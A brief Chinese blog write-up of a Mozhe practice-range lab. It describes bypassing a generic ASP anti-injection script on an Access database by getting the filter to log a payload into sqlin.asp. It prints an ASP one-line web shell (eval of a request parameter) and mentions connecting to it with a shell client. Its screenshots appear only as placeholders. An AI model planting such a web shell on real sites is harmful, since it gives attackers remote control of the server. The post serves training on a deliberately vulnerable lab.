access數(shù)據(jù)庫注入3-墨者靶場access(防注入)

https://www.mozhe.cn/bug/detail/19
一套SQL通用asp防注入腳本

單引號測試:


image.png

很奇怪,+ %0a and or 都會被檢測gg。
網(wǎng)上百度得知,access通用防注入系統(tǒng)會把所有記錄存到sqlin.asp中,再加上


image.png

這個實訓目標,應該是直接將木馬寫入到asp文件中
asp一句話木馬
<%eval request("a")%>
直接上傳


image.png

上yijian


image.png
image.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

友情鏈接更多精彩內(nèi)容